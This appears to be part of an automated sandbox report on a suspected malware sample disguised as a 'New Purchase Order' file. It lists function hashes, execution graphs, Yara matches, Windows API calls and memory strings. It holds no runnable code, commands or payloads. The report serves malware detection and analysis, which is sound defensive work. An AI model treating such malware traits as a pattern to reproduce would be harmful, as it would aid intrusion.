                • Instruction Fuzzy Hash: 0FE1FA74E00269CFDB14DFA9C580AAEBBF2BF48305F24825AD454A7755D7309982CF61
                Function 08089780 Relevance: .3, Instructions: 312COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fd420ded05fceec62b42d6adffdfe03fa44ade6ce84fd516ba6c7ca254f04ce4
                • Instruction ID: 79a6721499ea930e610db5bf606336e4d7c3923ba769269fbb45a6715e5c2859
                • Opcode Fuzzy Hash: fd420ded05fceec62b42d6adffdfe03fa44ade6ce84fd516ba6c7ca254f04ce4
                • Instruction Fuzzy Hash: 21E1F974E01259CFDB14EF99C580AAEBBF2BF89305F248269D454A7355D730AD82CF60
                Function 02CFE084 Relevance: .3, Instructions: 264COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2162909541.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2cf0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a149e55f05556a6b2a4a93d2e7606def0b9db8e2690c0e7cc7c4219dadce1da6
                • Instruction ID: 858a4479bd661b022fbda242ad0be1346d7b7d7c219d61929c5280a8ece9ddf9
                • Opcode Fuzzy Hash: a149e55f05556a6b2a4a93d2e7606def0b9db8e2690c0e7cc7c4219dadce1da6
                • Instruction Fuzzy Hash: 13A19032E002098FCF49DFB5C84059EB7B3FF85304B15856AEA05AB2A5DB31E916DF80
                Function 0808C038 Relevance: .1, Instructions: 137COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3204ec46ab946833fbe110233532eeb9683c8879f29383ba552971f49f0dc7c5
                • Instruction ID: bacbcab89afd3f968e7a89f2a16323ebb64b33f611e4b5f92452e389d2a8b9a8
                • Opcode Fuzzy Hash: 3204ec46ab946833fbe110233532eeb9683c8879f29383ba552971f49f0dc7c5
                • Instruction Fuzzy Hash: 39511C70E012598FDB14DFA9C5805AEFBF2BF89305F24826AD458A7316D7309D42CFA1
                Function 074D0006 Relevance: .1, Instructions: 104COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2169997628.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_74d0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2d2854b53dbd7f6f36caa5dd119445cba445bdecd82db32c3f32aef73adf0dab
                • Instruction ID: 5b919ea9a55a70b20d468359afdc36f0ca261dca37f96977ad10f9a37b404e92
                • Opcode Fuzzy Hash: 2d2854b53dbd7f6f36caa5dd119445cba445bdecd82db32c3f32aef73adf0dab
                • Instruction Fuzzy Hash: A4412CB1D057688FEB19CF66C8103DABBB2AF86315F04C1EBC449AB161DB750A86CF51

                Execution Graph

                Execution Coverage:1.2%
                Dynamic/Decrypted Code Coverage:4.3%
                Signature Coverage:6.7%
                Total number of Nodes:163
                Total number of Limit Nodes:14
                execution_graph 95377 424963 95378 42497f 95377->95378 95379 4249a7 95378->95379 95380 4249bb 95378->95380 95381 42c593 NtClose 95379->95381 95387 42c593 95380->95387 95383 4249b0 95381->95383 95384 4249c4 95390 42e753 RtlAllocateHeap 95384->95390 95386 4249cf 95388 42c5ad 95387->95388 95389 42c5be NtClose 95388->95389 95389->95384 95390->95386 95391 42f923 95392 42f893 95391->95392 95393 42f8f0 95392->95393 95397 42e713 95392->95397 95395 42f8cd 95400 42e633 95395->95400 95403 42c8a3 95397->95403 95399 42e72e 95399->95395 95406 42c8f3 95400->95406 95402 42e64c 95402->95393 95404 42c8c0 95403->95404 95405 42c8d1 RtlAllocateHeap 95404->95405 95405->95399 95407 42c90d 95406->95407 95408 42c91e RtlFreeHeap 95407->95408 95408->95402 95409 1812b60 LdrInitializeThunk 95410 4119e3 95411 4119f8 95410->95411 95416 413cb3 95411->95416 95414 42c593 NtClose 95415 411a11 95414->95415 95418 413cd9 95416->95418 95417 411a04 95417->95414 95418->95417 95420 413a33 95418->95420 95421 413a55 95420->95421 95423 42c813 95420->95423 95421->95417 95424 42c830 95423->95424 95427 1812c70 LdrInitializeThunk 95424->95427 95425 42c858 95425->95421 95427->95425 95428 418d83 95430 418db3 95428->95430 95431 418ddf 95430->95431 95432 41b283 95430->95432 95433 41b2c7 95432->95433 95434 41b2e8 95433->95434 95435 42c593 NtClose 95433->95435 95434->95430 95435->95434 95436 413fa3 95437 413fa4 95436->95437 95442 417733 95437->95442 95439 413fdb 95440 414020 95439->95440 95441 41400f PostThreadMessageW 95439->95441 95441->95440 95443 417757 95442->95443 95444 417793 LdrLoadDll 95443->95444 95445 41775e 95443->95445 95444->95445 95445->95439 95446 401b28 95447 401b30 95446->95447 95450 42fcc3 95447->95450 95453 42e1e3 95450->95453 95454 42e209 95453->95454 95465 4074c3 95454->95465 95456 42e21f 95457 401b49 95456->95457 95468 41b093 95456->95468 95459 42e23e 95460 42e253 95459->95460 95483 42c943 95459->95483 95479 428243 95460->95479 95463 42e26d 95464 42c943 ExitProcess 95463->95464 95464->95457 95486 4163f3 95465->95486 95467 4074d0 95467->95456 95469 41b0bf 95468->95469 95504 41af83 95469->95504 95472 41b0ec 95473 42c593 NtClose 95472->95473 95476 41b0f7 95472->95476 95473->95476 95474 41b120 95474->95459 95475 41b104 95475->95474 95477 42c593 NtClose 95475->95477 95476->95459 95478 41b116 95477->95478 95478->95459 95480 4282a5 95479->95480 95482 4282b2 95480->95482 95515 418593 95480->95515 95482->95463 95484 42c960 95483->95484 95485 42c971 ExitProcess 95484->95485 95485->95460 95487 416410 95486->95487 95489 416429 95487->95489 95490 42cfd3 95487->95490 95489->95467 95492 42cfed 95490->95492 95491 42d01c 95491->95489 95492->95491 95497 42bbc3 95492->95497 95495 42e633 RtlFreeHeap 95496 42d08f 95495->95496 95496->95489 95498 42bbe0 95497->95498 95501 1812c0a 95498->95501 95499 42bc0c 95499->95495 95502 1812c1f LdrInitializeThunk 95501->95502 95503 1812c11 95501->95503 95502->95499 95503->95499 95505 41af9d 95504->95505 95509 41b079 95504->95509 95510 42bc63 95505->95510 95508 42c593 NtClose 95508->95509 95509->95472 95509->95475 95511 42bc80 95510->95511 95514 18135c0 LdrInitializeThunk 95511->95514 95512 41b06d 95512->95508 95514->95512 95516 41859c 95515->95516 95522 418abb 95516->95522 95523 413c13 95516->95523 95518 4186e4 95519 42e633 RtlFreeHeap 95518->95519 95518->95522 95520 4186fc 95519->95520 95521 42c943 ExitProcess 95520->95521 95520->95522 95521->95522 95522->95482 95527 413c33 95523->95527 95525 413c9c 95525->95518 95526 413c92 95526->95518 95527->95525 95528 41b3a3 RtlFreeHeap LdrInitializeThunk 95527->95528 95528->95526 95529 42bb73 95530 42bb90 95529->95530 95533 1812df0 LdrInitializeThunk 95530->95533 95531 42bbb8 95533->95531 95534 428933 95535 428998 95534->95535 95536 4289d3 95535->95536 95539 418ad3 95535->95539 95538 4289b5 95540 418ae7 95539->95540 95541 418a92 95539->95541 95540->95538 95542 42c943 ExitProcess 95541->95542 95543 418abb 95542->95543 95543->95538 95544 424cf3 95548 424d0c 95544->95548 95545 424d54 95546 42e633 RtlFreeHeap 95545->95546 95547 424d64 95546->95547 95548->95545 95549 424d97 95548->95549 95551 424d9c 95548->95551 95550 42e633 RtlFreeHeap 95549->95550 95550->95551 95552 42f7f3 95553 42f803 95552->95553 95554 42f809 95552->95554 95555 42e713 RtlAllocateHeap 95554->95555 95556 42f82f 95555->95556 95557 428b93 95558 428bf7 95557->95558 95559 428c2e 95558->95559 95562 4243a3 95558->95562 95561 428c10 95563 4243a5 95562->95563 95564 4244a4 95563->95564 95565 424533 95563->95565 95566 424548 95563->95566 95564->95561 95567 42c593 NtClose 95565->95567 95568 42c593 NtClose 95566->95568 95569 42453c 95567->95569 95571 424551 95568->95571 95569->95561 95570 424588 95570->95561 95571->95570 95572 42e633 RtlFreeHeap 95571->95572 95573 42457c 95572->95573 95573->95561 95574 418cd8 95575 42c593 NtClose 95574->95575 95576 418ce2 95575->95576

                Executed Functions

                Function 00417733 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 197 417733-41774f 198 417757-41775c 197->198 199 417752 call 42f333 197->199 200 417762-417770 call 42f933 198->200 201 41775e-417761 198->201 199->198 204 417780-417791 call 42dcb3 200->204 205 417772-41777d call 42fbd3 200->205 210 417793-4177a7 LdrLoadDll 204->210 211 4177aa-4177ad 204->211 205->204 210->211
                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004177A5
                Memory Dump Source
                • Source File: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_400000_New Purchase Order.jbxd
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                • Instruction ID: 8e2604fe3315099ce7e6592766d58e4e85df4a541fcdf6f6d68356c2e9832f5c
                • Opcode Fuzzy Hash: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                • Instruction Fuzzy Hash: CE0152B5E4020DA7DB10DBA1DC42FDEB3789B54308F4081A6E91897281F635EB488B95
                Function 0042C593 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 238 42c593-42c5cc call 404773 call 42d7c3 NtClose
                APIs
                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C5C7
                Memory Dump Source
                • Source File: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_400000_New Purchase Order.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                • Instruction ID: 4730e45dc8a455a10bbaf9a925c332d30bf1f4e4369036d8bfc9a482ac9e8ca9
                • Opcode Fuzzy Hash: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                • Instruction Fuzzy Hash: 30E046766102147BD220BB6ADC41F9B77ACEFC5B14F40441AFA18A7281C676BA1087A8
                Function 01812B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 252 1812b60-1812b6c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 8acd668385cafe028139793b7531478e84e9a30557f8c8e85032e2f40671694c
                • Instruction ID: 1b6f9368f38854a1e7e43305ee862ba5052db39c601449f41626bd50172597bf
                • Opcode Fuzzy Hash: 8acd668385cafe028139793b7531478e84e9a30557f8c8e85032e2f40671694c
                • Instruction Fuzzy Hash: DA90026120241007450671584415616404A97E1301B55C021E6028590DC9258AD56226
                Function 01812DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 254 1812df0-1812dfc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: a9efdf416b95ef5c2006c012b51f17d293dbffb2088d5de79bfca56271637e4c
                • Instruction ID: b6459f3edac44bdf89660490404d8ab24c4872c40b9c9aff465eae100ee13c8e
                • Opcode Fuzzy Hash: a9efdf416b95ef5c2006c012b51f17d293dbffb2088d5de79bfca56271637e4c
                • Instruction Fuzzy Hash: A090023120141417D51271584505707004997D1341F95C412E5438558DDA568B96A222
                Function 01812C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 253 1812c70-1812c7c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 13cb389ae476d0ef52cd17d278a4fa07f95ac71ad8ad8ad1813e99a4aa31ac6f
                • Instruction ID: 64ee5e008ccd1cbe1113d2d323223580a9ca97d6900696a487d90a2a79887d76
                • Opcode Fuzzy Hash: 13cb389ae476d0ef52cd17d278a4fa07f95ac71ad8ad8ad1813e99a4aa31ac6f
                • Instruction Fuzzy Hash: C390023120149806D5117158840574A004597D1301F59C411E9438658DCA958AD57222
                Function 018135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: b521ac98b6a3ac880985078c55c6cb4fa047887e037e4c485760f01774324154
                • Instruction ID: 54c10105b04716dc5ac85bad8c0aed57fb5347fcacc74c9137f577b6d3274b23
                • Opcode Fuzzy Hash: b521ac98b6a3ac880985078c55c6cb4fa047887e037e4c485760f01774324154
                • Instruction Fuzzy Hash: 7E90023160551406D50171584515706104597D1301F65C411E5438568DCB958B9566A3
                Function 00413E32 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 186COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 413e32-413e3b 1 413ea2-413ebf 0->1 2 413e3d-413e40 0->2 5 413ec1-413ec8 1->5 6 413f1a-413f21 1->6 3 413e12-413e17 2->3 4 413e42-413e51 2->4 3->0 4->0 7 413e53-413e79 4->7 8 413eca-413ecc 5->8 9 413f3d-413f42 5->9 10 413f25 6->10 11 413e7b-413e9f 7->11 12 413ede 7->12 13 413ecd-413ed4 8->13 16 413f60-413f71 9->16 17 413f44-413f5e 9->17 14 413fa4-413fe2 call 42e6d3 call 42f0e3 call 417733 call 4046e3 10->14 15 413f27 10->15 11->1 13->10 21 413ed6-413eda 13->21 19 413fe6-41400d call 424e13 14->19 15->13 22 413f2a-413f3b 15->22 18 413f73-413f7a 16->18 16->19 17->16 18->14 31 41402d-414033 19->31 32 41400f-41401e PostThreadMessageW 19->32 21->12 22->9 32->31 33 414020-41402a 32->33 33->31
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_400000_New Purchase Order.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: 3h8t0-08$3h8t0-08$a~V
                • API String ID: 0-2215303234
                • Opcode ID: 81d29a8e1ef3792b9a479a4fc0f87079d8a20a8fd8b90cc9f61c1d646faaf081
                • Instruction ID: 5f72fba8100ebba8870b20796ede5c15298c30b13232037c41d5cf2924e7c9ec
                • Opcode Fuzzy Hash: 81d29a8e1ef3792b9a479a4fc0f87079d8a20a8fd8b90cc9f61c1d646faaf081
                • Instruction Fuzzy Hash: EC510232D482996FCB12CF708CC2DDEBFB9DE42345B4840ADE4446B242D6298E07C7D5
                Function 00413FA3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 0041401A
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_400000_New Purchase Order.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 3h8t0-08$3h8t0-08
                • API String ID: 1836367815-1947605396
                • Opcode ID: 6bcb1862a996d30975c64d4a1bb3983db3ea12b872ae8d1a2c4248d6048350d8
                • Instruction ID: e1e66dc98035f04d2431884f0e0db6d51c4b26c5f5f1261c7f2f59727122a13f
                • Opcode Fuzzy Hash: 6bcb1862a996d30975c64d4a1bb3983db3ea12b872ae8d1a2c4248d6048350d8
                • Instruction Fuzzy Hash: 600104B1D0021C7AEB11AAE29C81DEF7B7CDF80398F408069FA04A7241D6784E068BB5
                Function 00413F9F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20threadwindowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 51 413f9f-41401e PostThreadMessageW 53 414020-41402a 51->53 54 41402d-414033 51->54 53->54
                APIs
                • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 0041401A
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_400000_New Purchase Order.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 3h8t0-08$3h8t0-08
                • API String ID: 1836367815-1947605396
                • Opcode ID: 135beeca1b74d19290d0d057e79e408ff938a006e35054ead9790b99f903ef45
                • Instruction ID: 1603f725fde6bf5af95b6af14f59adfb275f0ca4856cf2d9dab87d41540ea272
                • Opcode Fuzzy Hash: 135beeca1b74d19290d0d057e79e408ff938a006e35054ead9790b99f903ef45
                • Instruction Fuzzy Hash: D6D0A732A4510865831355E56C41CFE7F7CD9C6755B0001A7EE04C4140F609491716E2
                Function 00417726 Relevance: 1.5, APIs: 1, Instructions: 37libraryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 212 417726-41772e 213 417730-41775c call 42f333 212->213 214 417793-4177a7 LdrLoadDll 212->214 218 417762-417770 call 42f933 213->218 219 41775e-417761 213->219 216 4177aa-4177ad 214->216 222 417780-417791 call 42dcb3 218->222 223 417772-41777d call 42fbd3 218->223 222->214 222->216 223->222
                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004177A5
                Memory Dump Source
                • Source File: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_400000_New Purchase Order.jbxd
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: 65f8a6c095fa10727bab02ecd6e11e6f0f6e72e2c6352eb367b5a389209ad39c
                • Instruction ID: 9cb1692463f57b7dfc76d45307d73cb454a5d3a2701c0a14866b4d9e4b00da90
                • Opcode Fuzzy Hash: 65f8a6c095fa10727bab02ecd6e11e6f0f6e72e2c6352eb367b5a389209ad39c
                • Instruction Fuzzy Hash: 7CF0B475E4410DABDF10DAD4D881FDDB7B5EB54318F00C2E6ED1C9B280E531EA498B90
                Function 0042C8F3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 233 42c8f3-42c934 call 404773 call 42d7c3 RtlFreeHeap
                APIs
                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,204889F0,00000007,00000000,00000004,00000000,00416FB5,000000F4), ref: 0042C92F
                Memory Dump Source
                • Source File: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_400000_New Purchase Order.jbxd
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 86d96a3a7410ab6ab211053b4fea2199c90ade22f87b5ad2487026e45bc71ae6
                • Instruction ID: 7b60794ad80a06acb647eca91f5e56653821d3cfb1d91a0d0caff21413609de5
                • Opcode Fuzzy Hash: 86d96a3a7410ab6ab211053b4fea2199c90ade22f87b5ad2487026e45bc71ae6
                • Instruction Fuzzy Hash: 3BE06DB22042047BD610EF59EC41EDB77ACDFC5710F00441AF908A7281DB75B9108BB8
                Function 0042C8A3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 228 42c8a3-42c8e7 call 404773 call 42d7c3 RtlAllocateHeap
                APIs
                • RtlAllocateHeap.NTDLL(?,0041E52E,?,?,00000000,?,0041E52E,?,?,?), ref: 0042C8E2
                Memory Dump Source
                • Source File: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_400000_New Purchase Order.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                • Instruction ID: 75f7dc53d552a5dc80399bc2a89f24ad6a6ecd643c57ce83a987320a35da5cda
                • Opcode Fuzzy Hash: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                • Instruction Fuzzy Hash: 95E06DB12042047BD610EF69EC41EAB37ACDFC5710F004419FE08A7242D770B9148AB9
                Function 0042C943 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 243 42c943-42c97f call 404773 call 42d7c3 ExitProcess
                APIs
                • ExitProcess.KERNEL32(?,00000000,00000000,?,7D282D94,?,?,7D282D94), ref: 0042C97A
                Memory Dump Source
                • Source File: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_400000_New Purchase Order.jbxd
                Yara matches
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                • Opcode ID: 52f014dffe07f1b75dafc72ee9e052d85fafd1d86f3f1a40ae16dcff4a33ecd6
                • Instruction ID: 682fffa712135dc736fe9070f12072bcd6a9e54f8752c83740501f4c0056a1d0
                • Opcode Fuzzy Hash: 52f014dffe07f1b75dafc72ee9e052d85fafd1d86f3f1a40ae16dcff4a33ecd6
                • Instruction Fuzzy Hash: BEE046766402147BD620AB6AEC42F9B776CDFC5714F40841AFA08A7241CA74BA0587B8
                Function 01812C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 248 1812c0a-1812c0f 249 1812c11-1812c18 248->249 250 1812c1f-1812c26 LdrInitializeThunk 248->250
                APIs
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 6821069460c1346d77b167690b537749fbb404e49ead14cb2e7b36270e9c5721
                • Instruction ID: 9abed68a71e7f21ee72063e5296d6cea9277a80b7ede74f5c0e266b0cb339ce4
                • Opcode Fuzzy Hash: 6821069460c1346d77b167690b537749fbb404e49ead14cb2e7b36270e9c5721
                • Instruction Fuzzy Hash: 47B09B729015D5CADE12E7644609717794577D1701F25C061D3034641F4738C2D5E276

                Non-executed Functions

                Function 01852349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                • API String ID: 0-2160512332
                • Opcode ID: 32e67eac29a86e69931b0fe6a706837c6202a154f993a8fd876c7ac888c63953
                • Instruction ID: e22d66a33724d25415eeb6b4c94da776908a07403dda96bc1602e299c3e829fd
                • Opcode Fuzzy Hash: 32e67eac29a86e69931b0fe6a706837c6202a154f993a8fd876c7ac888c63953
                • Instruction Fuzzy Hash: 83928B71604346EBE761CE28C884B6BB7EAFB84754F04482DFE94D7251DB70EA44CB92
                Function 01808620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                Download Yara Rule
                Strings
                • undeleted critical section in freed memory, xrefs: 0184542B
                • Thread is in a state in which it cannot own a critical section, xrefs: 01845543
                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0184540A, 01845496, 01845519
                • Thread identifier, xrefs: 0184553A
                • 8, xrefs: 018452E3
                • Invalid debug info address of this critical section, xrefs: 018454B6
                • double initialized or corrupted critical section, xrefs: 01845508
                • Address of the debug info found in the active list., xrefs: 018454AE, 018454FA
                • Critical section address, xrefs: 01845425, 018454BC, 01845534
                • corrupted critical section, xrefs: 018454C2
                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018454CE
                • Critical section address., xrefs: 01845502
                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018454E2
                • Critical section debug info address, xrefs: 0184541F, 0184552E
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                • API String ID: 0-2368682639
                • Opcode ID: 6d5c65e63a404886b9ebe5d70ec052ae9ed3c8d2891c6f304a832a6d8a783a78
                • Instruction ID: ee40f0e787f32a41f7f3071e9a06d798941f657dec829e94d1d437be626d19ae
                • Opcode Fuzzy Hash: 6d5c65e63a404886b9ebe5d70ec052ae9ed3c8d2891c6f304a832a6d8a783a78
                • Instruction Fuzzy Hash: 05818BB1A01348EFDB60CF99C895BAEFBB9BB09B14F204119F504F7280D775AA40CB91
                Function 018029F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                Download Yara Rule
                Strings
                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01842412
                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0184261F
                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01842498
                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01842624
                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018425EB
                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018424C0
                • @, xrefs: 0184259B
                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018422E4
                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01842506
